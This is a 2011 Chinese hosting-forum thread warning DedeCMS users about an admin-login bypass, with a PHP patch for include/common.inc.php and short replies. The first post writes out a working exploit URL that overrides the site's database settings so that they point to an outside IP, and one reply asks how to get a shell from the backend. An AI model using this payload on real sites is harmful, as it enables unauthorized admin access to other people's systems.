全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 4167|回复: 29
打印 上一主题 下一主题

[经验] 用DEDECMS的注意了,赶紧修改后台地址

[复制链接]
跳转到指定楼层
1#
发表于 2011-8-11 09:51:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.xx.com/后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

只要把验证码改为当前验证码,就能直接无密码进后台
  1. 解决办法:
  2. 找到include/common.inc.php文件,把


  3.     foreach($_REQUEST as $_k=>$_v)
  4.     {
  5.         var_dump($_k);
  6.         if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
  7.         {
  8.             exit('Request var not allow!');
  9.         }
  10.     }

  11. 换成

  12.     //检查和注册外部提交的变量
  13.     function CheckRequest(&$val) {
  14.         if (is_array($val)) {
  15.             foreach ($val as $_k=>$_v) {
  16.                 CheckRequest($_k);
  17.                 CheckRequest($val[$_k]);
  18.             }
  19.         } else
  20.         {
  21.             if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
  22.             {
  23.                 exit('Request var not allow!');
  24.             }
  25.         }
  26.     }
  27.     CheckRequest($_REQUEST);
复制代码
2#
发表于 2011-8-11 09:52:04 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
3#
发表于 2011-8-11 09:55:43 | 只看该作者
5.6貌似没这漏洞?
4#
发表于 2011-8-11 09:56:53 | 只看该作者
原帖由 geyunbing 于 2011-8-11 09:52 发表
靠  又出bug
5#
发表于 2011-8-11 09:57:57 | 只看该作者
给力啊
6#
发表于 2011-8-11 10:00:53 | 只看该作者
dedecms后台怎么拿shell

貌似这个漏洞 5.7 5.6 都提示 你的密码错误。

[ 本帖最后由 xen 于 2011-8-11 10:20 编辑 ]
7#
发表于 2011-8-11 10:01:02 | 只看该作者
原帖由 geyunbing 于 2011-8-11 09:52 发表
靠  又出bug
8#
发表于 2011-8-11 10:01:53 | 只看该作者
dedecms 未发现的bug应该还不少。
9#
发表于 2011-8-11 10:03:06 | 只看该作者
还好一直没用dede
10#
发表于 2011-8-11 10:03:10 | 只看该作者
试过了,好像这个洞不行哦
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-5-22 01:53 , Processed in 0.075848 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表